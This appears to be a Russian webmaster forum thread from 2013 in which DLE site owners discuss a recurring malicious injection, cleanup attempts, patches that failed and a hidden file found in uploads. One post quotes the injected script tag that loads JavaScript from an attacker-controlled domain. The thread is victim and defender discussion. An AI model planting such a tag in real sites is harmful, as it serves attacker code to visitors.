ProLiant

ProLiant
Рейтинг
249
Регистрация
07.12.2005

Уже начали раньше обсуждать этот вредоносный код. Предлагаю, что бы не плодить кучу тем, там и продолжать, в одном месте. Ссылка на тему

maximka77:
На форуме ДЛЕ Целсофт пишет что можно попробовать выполнить перестроение публикаций для новостей, а статические страницы нужно чистить ручками.
Вот топик

Попробовать.. Хм, что это даст? Код удалится, или дыра закрывается? :)

---------- Добавлено 13.09.2013 в 08:05 ----------

Gooodd:
у меня такая модификация еще вчера была, все почистил вчера, сменил пароли, пока что все ок, наблюдаем за развитием событий )

Не... Вчера у меня снова webmaster-yandex появился вечерком. Тоже восстановил бэкап базы, все пароли (в очередной раз сменил), сегодня утром уже сидел webmaster-google. :)

fat87:
Народ, как очистить то понятно. Вопрос в том, что за уязвимость массовая? Помогает ли последняя заплатка последняя (в файле /engine/classes/min/index.php) и патч 9.7 официальный (от января 2013)? Или это что-то новое?

Нет, заплатка эта точно не помогает! Ломают в другую дыру. Сегодня уже модификация появилась, вида:

<script async="async" type="text/javascript" src="http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js"></script>

Тоже, сколько не пытаюсь найти шелл в файлах двига - ничего не нахожу. :( И действительно, в шаблоне правил сайта внизу тоже эта гадость добавляется.

BrightGuy, Спасибо, конечно. Но не все там так просто. На своем опыте, вчера на одном из сайтов все так и сделали. Вычистили базу, сменили все пароли, поставили заплатку в /engine/classes/min/index.php, прогнали айболитом (ничего, кстати, не нашлось). В engine/cache/system/ никаких подобных файлов не появлялось. Сегодня снова появилась эта гадость.. Значит еще есть дыра.

П.с. Вычистил на нескольких сайтах, все процедуры аналогичные, появилась снова (пока) на одном. Сайты на ДЛЕ 9.8 и 10.

reso:
Чтобы внести изминения в базу которая на localhost, скрипту необходимо физически быть на сервере. Это разве что прямой доступ через PhpMyAdmin.

А он и есть на сервере. У меня, например, валялся в uploads/posts/2012-08/rss.js

Сеодня, смотрю, целая эпидемия внедрения webmasters-yandex.ru на ДЛЕ сайты... :) Никто не смотрел, как попали коды на сайты? Из-за дыры, ссылку на которую вначале давали?

Эта зараза после удаления, кстати, снова появляется... Заплатка с баг фикса ДЛЕ 10 уже стоит...

Может это и из-за дыры, о которой выше говорилось... А спрашивал, как все удалил? :)

Abrikosik:
Огромное спасибо за информацию Вам, проблема устранена...

Каким образом? Сегодня и у себя нашел эту заразу...

montiorko:
обновите плагин. вчера обновил, строка появилась, только изображение не отдает. отписал в тикет

Вчера тоже скачивал, обновлял, не было ничего. Только что снова скачал-обновил - есть! :)

teamPays:
Хотели бы сделать уточнение по предыдущей новости: Функция IMAGEURL подключается индивидуально для каждого партнера.

Ждем реализации подобного в ДЛЕ модуле. ;)

Всего: 2596